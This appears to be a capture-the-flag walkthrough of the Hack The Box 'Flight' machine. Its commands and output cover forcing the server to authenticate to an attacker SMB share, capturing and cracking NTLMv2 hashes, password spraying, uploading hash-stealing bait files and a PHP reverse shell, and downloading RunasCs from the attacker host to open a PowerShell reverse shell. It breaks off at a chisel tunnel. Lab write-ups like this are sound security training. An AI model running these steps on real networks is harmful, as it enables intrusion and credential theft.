Flight | HTB
Machine - https://app.hackthebox.com/machines/Flight
IP - 10.10.11.187
NMAP
└─$ nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,9389,49667,49673,49674,49694,49719 10.10.11.187 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-19 14:12 IST
Nmap scan report for 10.10.11.187
Host is up (0.31s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-19 15:42:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49719/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-08-19T15:44:03
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h00m02s
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 137.69 seconds
Port 53
└─$ dig any @10.10.11.187 flight.htb
; <<>> DiG 9.20.8-6-Debian <<>> any @10.10.11.187 flight.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 24195
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 4
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;flight.htb. IN ANY
;; ANSWER SECTION:
flight.htb. 600 IN A 192.168.22.180
flight.htb. 3600 IN NS g0.flight.htb.
flight.htb. 3600 IN SOA g0.flight.htb. hostmaster.flight.htb. 41 900 600 86400 3600
;; ADDITIONAL SECTION:
g0.flight.htb. 3600 IN A 10.10.11.187
g0.flight.htb. 3600 IN AAAA dead:beef::23d
g0.flight.htb. 3600 IN AAAA dead:beef::d139:bc2b:d648:e9eb
;; Query time: 359 msec
;; SERVER: 10.10.11.187#53(10.10.11.187) (TCP)
;; WHEN: Tue Aug 19 14:23:04 IST 2025
;; MSG SIZE rcvd: 191Port 80
For some reason i am unable to do directory enumeration
Let’s try to do subdomain enum
└─$ wfuzz -c -u <http://flight.htb/> -H "Host: FUZZ.flight.htb" -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt --hc 302,400,301,404 --hw 530
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: <http://flight.htb/>
Total requests: 484699
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000264: 200 90 L 412 W 3996 Ch "school"
Total time: 373.8789
Processed Requests: 384
Filtered Requests: 383
Requests/sec.: 1.027070
/usr/lib/python3/dist-packages/wfuzz/wfuzz.py:78: UserWarning:Fatal exception: Pycurl error 28: Operation timed out after 90000 milliseconds with 0 bytes receivedlet’s add this to our hosts file and visit
Let’s do a directory enum
└─$ dirsearch -u <http://school.flight.htb/> -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/anurag/htb/Flight/reports/http_school.flight.htb/__25-08-19_19-33-33.txt
Target: <http://school.flight.htb/>
[19:33:33] Starting:
[19:34:22] 200 - 2KB - /about.html
[19:35:00] 200 - 2KB - /cgi-bin/printenv.pl
[19:35:15] 503 - 406B - /examples
[19:35:15] 503 - 406B - /examples/
[19:35:15] 503 - 406B - /examples/jsp/index.html
[19:35:15] 503 - 406B - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[19:35:15] 503 - 406B - /examples/jsp/snp/snoop.jsp
[19:35:15] 503 - 406B - /examples/servlet/SnoopServlet
[19:35:15] 503 - 406B - /examples/servlets/index.html
[19:35:15] 503 - 406B - /examples/servlets/servlet/RequestHeaderExample
[19:35:15] 503 - 406B - /examples/websocket/index.xhtml
[19:35:15] 503 - 406B - /examples/servlets/servlet/CookieExample
[19:35:24] 301 - 347B - /images -> <http://school.flight.htb/images/>
[19:35:26] 200 - 3KB - /home.html
[19:35:28] 200 - 4KB - /images/
[19:36:11] 301 - 347B - /styles -> <http://school.flight.htb/styles/>
Task Completed on visiting http://school.flight.htb/cgi-bin/printenv.pl we found
COMSPEC="C:\\Windows\\system32\\cmd.exe"
CONTEXT_DOCUMENT_ROOT="/xampp/cgi-bin/"
CONTEXT_PREFIX="/cgi-bin/"
DOCUMENT_ROOT="C:/xampp/htdocs/school.flight.htb"
GATEWAY_INTERFACE="CGI/1.1"
HTTP_ACCEPT="text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
HTTP_ACCEPT_ENCODING="gzip, deflate"
HTTP_ACCEPT_LANGUAGE="en-US,en;q=0.5"
HTTP_CONNECTION="keep-alive"
HTTP_HOST="school.flight.htb"
HTTP_PRIORITY="u=0, i"
HTTP_UPGRADE_INSECURE_REQUESTS="1"
HTTP_USER_AGENT="Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
MIBDIRS="/xampp/php/extras/mibs"
MYSQL_HOME="\\xampp\\mysql\\bin"
OPENSSL_CONF="/xampp/apache/bin/openssl.cnf"
PATH="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\OpenSSH\\;C:\\Users\\svc_apache\\AppData\\Local\\Microsoft\\WindowsApps"
PATHEXT=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC"
PHPRC="\\xampp\\php"
PHP_PEAR_SYSCONF_DIR="\\xampp\\php"
QUERY_STRING=""
REMOTE_ADDR="10.10.14.7"
REMOTE_PORT="47730"
REQUEST_METHOD="GET"
REQUEST_SCHEME="http"
REQUEST_URI="/cgi-bin/printenv.pl"
SCRIPT_FILENAME="C:/xampp/cgi-bin/printenv.pl"
SCRIPT_NAME="/cgi-bin/printenv.pl"
SERVER_ADDR="10.10.11.187"
SERVER_ADMIN="postmaster@localhost"
SERVER_NAME="school.flight.htb"
SERVER_PORT="80"
SERVER_PROTOCOL="HTTP/1.1"
SERVER_SIGNATURE="<address>Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1 Server at school.flight.htb Port 80</address>\\n"
SERVER_SOFTWARE="Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1"
SYSTEMROOT="C:\\Windows"
TMP="\\xampp\\tmp"
WINDIR="C:\\Windows"on looking at blogs, the URL was interesting
When trying to access files, we get this
Looks like some filtering
Foothold/shell
Shell as ?
Auth as svc_apache
LFI
When trying / instead of \\ We get the result
This confirms that LFI is there
RFI test
Let’s see whether allow_url_include is enabled or not
Unfortunately, it was executed as a text file
NTLM hash over SMB
We already know that we have a Windows host with SMB running on it. What if we tell the web server to connect to a share on our machine? Well, if everything goes fine, it should normally try to authenticate to our SMB server, and we must be able to capture its Net-NTLMv2 hash and then crack it.
Let’s start our responder
└─$ sudo responder -I tun0and force it to connect to our share
<http://school.flight.htb/index.php?view=//10.10.14.7/test>we can see the hash on our responder
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight\\svc_apache
[SMB] NTLMv2-SSP Hash : svc_apache::flight:f3eb77a70d216d60:4052C5B0E782A6292C794B3036B90C8E:010100000000000080105B274411DC010FE6A934FFF31F1D0000000002000800570035005A00320001001E00570049004E002D004500590055004F00310033005600530059003400550004003400570049004E002D004500590055004F0031003300560053005900340055002E00570035005A0032002E004C004F00430041004C0003001400570035005A0032002E004C004F00430041004C0005001400570035005A0032002E004C004F00430041004C000700080080105B274411DC01060004000200000008003000300000000000000000000000003000001A312B65038CBB9A9A1794D25D92469F12DD40C4FACD57D936D4EDDF3F074C520A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0037000000000000000000 let’s try to crack it
└─$ hashcat hashes.txt -m 5600 /home/anurag/stuff/rockyou.txt
<--SNIP-->
SVC_APACHE::flight:f3eb77a70d216d60:4052c5b0e782a6292c794b3036b90c8e:010100000000000080105b274411dc010fe6a934fff31f1d0000000002000800570035005a00320001001e00570049004e002d004500590055004f00310033005600530059003400550004003400570049004e002d004500590055004f0031003300560053005900340055002e00570035005a0032002e004c004f00430041004c0003001400570035005a0032002e004c004f00430041004c0005001400570035005a0032002e004c004f00430041004c000700080080105b274411dc01060004000200000008003000300000000000000000000000003000001a312b65038cbb9a9a1794d25d92469f12dd40c4facd57d936d4eddf3f074c520a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0037000000000000000000:S@Ss!K@*t13
<--SNIP-->LDAP and smb both were able to authenticate
└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto 10.10.11.187 -d flight.htb -u svc_apache -p 'S@Ss!K@*t13'; echo; done
LDAP 10.10.11.187 389 G0 [*] Windows 10 / Server 2019 Build 17763 (name:G0) (domain:flight.htb)
LDAP 10.10.11.187 389 G0 [+] flight.htb\\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\\svc_apache:S@Ss!K@*t13 Let’s enum shares since LDAP was not possible
└─$ smbmap -H 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \\ /" || _ "\\ |" \\ /" | /""\\ | __ "\\
(: \\___/ \\ \\ // |(. |_) :) \\ \\ // | / \\ (. |__) :)
\\___ \\ /\\ \\/. ||: \\/ /\\ \\/. | /' /\\ \\ |: ____/
__/ \\ |: \\. |(| _ \\ |: \\. | // __' \\ (| /
/" \\ :) |. \\ /: ||: |_) :)|. \\ /: | / / \\ \\ /|__/ \\
(_______/ |___|\\__/|___|(_______/ |___|\\__/|___|(___/ \\___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
<https://github.com/ShawnDEvans/smbmap>
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.11.187:445 Name: flight.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Shared READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
Web READ ONLY
[*] Closed 1 connections Users and Web looks interesting, let’s connect and see
─$ smbmap -H 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13' -r --dir-only
________ ___ ___ _______ ___ ___ __ _______
/" )|" \\ /" || _ "\\ |" \\ /" | /""\\ | __ "\\
(: \\___/ \\ \\ // |(. |_) :) \\ \\ // | / \\ (. |__) :)
\\___ \\ /\\ \\/. ||: \\/ /\\ \\/. | /' /\\ \\ |: ____/
__/ \\ |: \\. |(| _ \\ |: \\. | // __' \\ (| /
/" \\ :) |. \\ /: ||: |_) :)|. \\ /: | / / \\ \\ /|__/ \\
(_______/ |___|\\__/|___|(_______/ |___|\\__/|___|(___/ \\___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
<https://github.com/ShawnDEvans/smbmap>
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.11.187:445 Name: flight.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
./NETLOGON
dr--r--r-- 0 Fri Sep 23 01:17:44 2022 .
dr--r--r-- 0 Fri Sep 23 01:17:44 2022 ..
Shared READ ONLY
./Shared
dr--r--r-- 0 Sat Oct 29 01:51:28 2022 .
dr--r--r-- 0 Sat Oct 29 01:51:28 2022 ..
SYSVOL READ ONLY Logon server share
./SYSVOL
dr--r--r-- 0 Fri Sep 23 01:17:44 2022 .
dr--r--r-- 0 Fri Sep 23 01:17:44 2022 ..
dr--r--r-- 0 Fri Sep 23 01:17:44 2022 flight.htb
Users READ ONLY
./Users
dw--w--w-- 0 Fri Sep 23 01:46:56 2022 .
dw--w--w-- 0 Fri Sep 23 01:46:56 2022 ..
dr--r--r-- 0 Fri Sep 23 00:58:03 2022 .NET v4.5
dr--r--r-- 0 Fri Sep 23 00:58:02 2022 .NET v4.5 Classic
dr--r--r-- 0 Tue Nov 1 00:04:00 2022 Administrator
dr--r--r-- 0 Wed Jul 21 01:49:19 2021 All Users
dr--r--r-- 0 Fri Sep 23 01:38:23 2022 C.Bum
dw--w--w-- 0 Wed Jul 21 00:50:24 2021 Default
dr--r--r-- 0 Wed Jul 21 01:49:19 2021 Default User
dw--w--w-- 0 Wed Jul 21 00:53:25 2021 Public
dr--r--r-- 0 Sat Oct 22 00:20:21 2022 svc_apache
Web READ ONLY
./Web
dr--r--r-- 0 Wed Aug 20 03:17:01 2025 .
dr--r--r-- 0 Wed Aug 20 03:17:01 2025 ..
dr--r--r-- 0 Wed Aug 20 03:17:01 2025 flight.htb
dr--r--r-- 0 Wed Aug 20 03:17:01 2025 school.flight.htb
[*] Closed 1 connections USers Looks like C directory
nothing was there looks like empty directories
Password spray
we found the username
└─$ netexec smb 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13' -d flight.htb --users
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.187 445 G0 Administrator 2022-09-22 20:17:02 0 Built-in account for administering the computer/domain
SMB 10.10.11.187 445 G0 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.187 445 G0 krbtgt 2022-09-22 19:48:01 0 Key Distribution Center Service Account
SMB 10.10.11.187 445 G0 S.Moon 2022-09-22 20:08:22 0 Junion Web Developer
SMB 10.10.11.187 445 G0 R.Cold 2022-09-22 20:08:22 0 HR Assistant
SMB 10.10.11.187 445 G0 G.Lors 2022-09-22 20:08:22 0 Sales manager
SMB 10.10.11.187 445 G0 L.Kein 2022-09-22 20:08:22 0 Penetration tester
SMB 10.10.11.187 445 G0 M.Gold 2022-09-22 20:08:22 0 Sysadmin
SMB 10.10.11.187 445 G0 C.Bum 2022-09-22 20:08:22 0 Senior Web Developer
SMB 10.10.11.187 445 G0 W.Walker 2022-09-22 20:08:22 0 Payroll officer
SMB 10.10.11.187 445 G0 I.Francis 2022-09-22 20:08:22 0 Nobody knows why he's here
SMB 10.10.11.187 445 G0 D.Truff 2022-09-22 20:08:22 0 Project Manager
SMB 10.10.11.187 445 G0 V.Stevens 2022-09-22 20:08:22 0 Secretary
SMB 10.10.11.187 445 G0 svc_apache 2022-09-22 20:08:23 0 Service Apache web
SMB 10.10.11.187 445 G0 O.Possum 2022-09-22 20:08:23 0 Helpdesk
SMB 10.10.11.187 445 G0 [*] Enumerated 15 local users: flightlet’s copy them and perform a password spray
└─$ netexec smb 10.10.11.187 -u username.txt -p 'S@Ss!K@*t13' -d flight.htb --continue-on-success
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [-] flight.htb\\Administrator:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [+] flight.htb\\S.Moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] flight.htb\\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [+] flight.htb\\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] flight.htb\\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE Auth as S.Moon
└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto 10.10.11.187 -d flight.htb -u S.Moon -p 'S@Ss!K@*t13'; echo; done
LDAP 10.10.11.187 389 G0 [*] Windows 10 / Server 2019 Build 17763 (name:G0) (domain:flight.htb)
LDAP 10.10.11.187 389 G0 [+] flight.htb\\S.Moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\\S.Moon:S@Ss!K@*t13 LDAP was not possible, let’s enum shares
└─$ netexec smb flight.htb -u S.Moon -p 'S@Ss!K@*t13' --shares
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\\S.Moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [*] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ,WRITE
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ We have Read and Write permission
NTLM Theft File upload
We cannot upload a text file (maybe some filtering?)
smb: \\> put test.txt
NT_STATUS_ACCESS_DENIED opening remote file \\test.txt
smb: \\> But we can upload file
smb: \\> put test.txt
NT_STATUS_ACCESS_DENIED opening remote file \\test.txt
smb: \\> put test.php
NT_STATUS_ACCESS_DENIED opening remote file \\test.php
smb: \\> put test.unknown
putting file test.unknown as \\test.unknown (0.0 kb/s) (average 0.0 kb/s)
smb: \\> Let’s try to perform NTLM thef via file upload
└─$ python3 ntlm_theft/ntlm_theft.py --generate all --server 10.10.16.3 --filename test
Created: test/test.scf (BROWSE TO FOLDER)
Created: test/test-(url).url (BROWSE TO FOLDER)
Created: test/test-(icon).url (BROWSE TO FOLDER)
Created: test/test.lnk (BROWSE TO FOLDER)
Created: test/test.rtf (OPEN)
Created: test/test-(stylesheet).xml (OPEN)
Created: test/test-(fulldocx).xml (OPEN)
Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: test/test-(includepicture).docx (OPEN)
Created: test/test-(remotetemplate).docx (OPEN)
Created: test/test-(frameset).docx (OPEN)
Created: test/test-(externalcell).xlsx (OPEN)
Created: test/test.wax (OPEN)
Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: test/test.asx (OPEN)
Created: test/test.jnlp (OPEN)
Created: test/test.application (DOWNLOAD AND OPEN)
Created: test/test.pdf (OPEN AND ALLOW)
Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: test/Autorun.inf (BROWSE TO FOLDER)
Created: test/desktop.ini (BROWSE TO FOLDER)
Generation Complete.Now start the responder and upload
└─$ smbclient -U 'S.Moon%S@Ss!K@*t13' //10.10.11.187/Shared
Try "help" to get a list of possible commands.
smb: \\> prompt false
smb: \\> mput *
NT_STATUS_ACCESS_DENIED opening remote file \\zoom-attack-instructions.txt
putting file test-(fulldocx).xml as \\test-(fulldocx).xml (12.0 kb/s) (average 12.0 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \\test-(includepicture).docx
NT_STATUS_ACCESS_DENIED opening remote file \\test-(externalcell).xlsx
NT_STATUS_ACCESS_DENIED opening remote file \\test-(remotetemplate).docx
NT_STATUS_ACCESS_DENIED opening remote file \\Autorun.inf
putting file desktop.ini as \\desktop.ini (0.0 kb/s) (average 10.3 kb/s)
putting file test-(stylesheet).xml as \\test-(stylesheet).xml (0.2 kb/s) (average 9.1 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \\test.wax
NT_STATUS_ACCESS_DENIED opening remote file \\test.scf
NT_STATUS_ACCESS_DENIED opening remote file \\test.m3u
NT_STATUS_ACCESS_DENIED opening remote file \\test.lnk
NT_STATUS_ACCESS_DENIED opening remote file \\test-(frameset).docx
putting file test.application as \\test.application (1.0 kb/s) (average 7.7 kb/s)
putting file test.jnlp as \\test.jnlp (0.1 kb/s) (average 6.5 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \\test.asx
NT_STATUS_ACCESS_DENIED opening remote file \\test.rtf
NT_STATUS_ACCESS_DENIED opening remote file \\test.htm
NT_STATUS_ACCESS_DENIED opening remote file \\test.pdf
NT_STATUS_ACCESS_DENIED opening remote file \\test-(url).url
NT_STATUS_ACCESS_DENIED opening remote file \\test-(icon).url
smb: \\> On responder, we get the hash
└─$ sudo responder -I tun0
<--SNIP-->
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight.htb\\c.bum
[SMB] NTLMv2-SSP Hash : c.bum::flight.htb:439d3511943fe1c7:E7F929A94B09CE2E9698D13BC54A1C0E:0101000000000000000205335911DC01110A12C6D1CD55A70000000002000800320049003100560001001E00570049004E002D0038003800310034003400360046003700460051005A0004003400570049004E002D0038003800310034003400360046003700460051005A002E0032004900310056002E004C004F00430041004C000300140032004900310056002E004C004F00430041004C000500140032004900310056002E004C004F00430041004C0007000800000205335911DC010600040002000000080030003000000000000000000000000030000027BDB9CB60F2C561E130226AD1CD3F4E3D60E016BA8F1A7D4A1B215FBD32E7D10A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0033000000000000000000 Auth as C.Bum
Let’s crack the hash
└─$ hashcat hashes.txt -m 5600 /home/anurag/stuff/rockyou.txt
<--SNIP-->
C.BUM::flight.htb:439d3511943fe1c7:e7f929a94b09ce2e9698d13bc54a1c0e:0101000000000000000205335911dc01110a12c6d1cd55a70000000002000800320049003100560001001e00570049004e002d0038003800310034003400360046003700460051005a0004003400570049004e002d0038003800310034003400360046003700460051005a002e0032004900310056002e004c004f00430041004c000300140032004900310056002e004c004f00430041004c000500140032004900310056002e004c004f00430041004c0007000800000205335911dc010600040002000000080030003000000000000000000000000030000027bdb9cb60f2c561e130226ad1cd3f4e3d60e016ba8f1a7d4a1b215fbd32e7d10a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0033000000000000000000:Tikkycoll_431012284We can use LDAP and SMB via C.BUM
└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto 10.10.11.187 -d flight.htb -u C.BUM -p 'Tikkycoll_431012284'; echo; done
LDAP 10.10.11.187 389 G0 [*] Windows 10 / Server 2019 Build 17763 (name:G0) (domain:flight.htb)
LDAP 10.10.11.187 389 G0 [+] flight.htb\\C.BUM:Tikkycoll_431012284
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\\C.BUM:Tikkycoll_431012284 Looks like we can read and write on Web
└─$ netexec smb flight.htb -u C.BUM -p 'Tikkycoll_431012284' --shares
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\\C.BUM:Tikkycoll_431012284
SMB 10.10.11.187 445 G0 [*] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ,WRITE
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ,WRITE And it is the share for the website
└─$ smbclient -U 'C.BUM%Tikkycoll_431012284' //10.10.11.187/Web
Try "help" to get a list of possible commands.
smb: \\> ls
. D 0 Wed Aug 20 05:52:01 2025
.. D 0 Wed Aug 20 05:52:01 2025
flight.htb D 0 Wed Aug 20 05:52:01 2025
school.flight.htb D 0 Wed Aug 20 05:52:01 2025
5056511 blocks of size 4096. 1249940 blocks available
smb: \\> Let’s try to upload a text file
smb: \\flight.htb\\> put test.txt
putting file test.txt as \\flight.htb\\test.txt (0.0 kb/s) (average 0.0 kb/s)
smb: \\flight.htb\\> ls
. D 0 Wed Aug 20 05:54:16 2025
.. D 0 Wed Aug 20 05:54:16 2025
css D 0 Wed Aug 20 05:52:01 2025
images D 0 Wed Aug 20 05:52:01 2025
index.html A 7069 Thu Feb 24 11:28:10 2022
js D 0 Wed Aug 20 05:52:01 2025
test.txt A 5 Wed Aug 20 05:54:16 2025
5056511 blocks of size 4096. 1249940 blocks available
smb: \\flight.htb\\> 
Shell as svc_apache
And we can upload php file, and it can execute
smb: \\flight.htb\\> put test.php
putting file test.php as \\flight.htb\\test.php (0.0 kb/s) (average 0.0 kb/s)
smb: \\flight.htb\\> 
We can upload a PHP RevShell and get a shell
smb: \\flight.htb\\> put revshell.php
putting file revshell.php as \\flight.htb\\revshell.php (7.2 kb/s) (average 3.3 kb/s)
smb: \\flight.htb\\> └─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.187] 50247
SOCKET: Shell has connected! PID: 4812
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\xampp\\htdocs\\flight.htb>whoami
flight\\svc_apache
C:\\xampp\\htdocs\\flight.htb>Shell as C.Bum
Let’s upload RunasC and get the shell
C:\\temp>curl <http://10.10.16.3/RunasCs.exe> -o RunasCs.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 51712 100 51712 0 0 18604 0 0:00:02 0:00:02 --:--:-- 18628
C:\\temp>.\\RunasCs.exe C.Bum Tikkycoll_431012284 powershell.exe -r 10.10.16.3:9001
[*] Warning: The logon for user 'C.Bum' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\\Desktop: Service-0x0-58fdd$\\Default
[+] Async process 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe' with pid 4080 created in background.
C:\\temp>└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.187] 50278
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\\Windows\\system32> whoami
whoami
flight\\c.bum
PS C:\\Windows\\system32> And we get user.txt
PS C:\\Users\\C.Bum\\Desktop> dir
dir
Directory: C:\\Users\\C.Bum\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/19/2025 2:21 PM 34 user.txt
PS C:\\Users\\C.Bum\\Desktop> Privilege Escalation
Shell as ?
internal port 8000
we found that there is something running on internal port 8000
Let’s use chisel
└─$ ./chisel server -p 8000 --reverse
2025/08/20 21:38:11 server: Reverse tunnelling enabled
2025/08/20 21:38:11 server: Fingerprint djTX3b380m4VT345PaUEAlXkBzvLZyPj6h54LaSMhro=
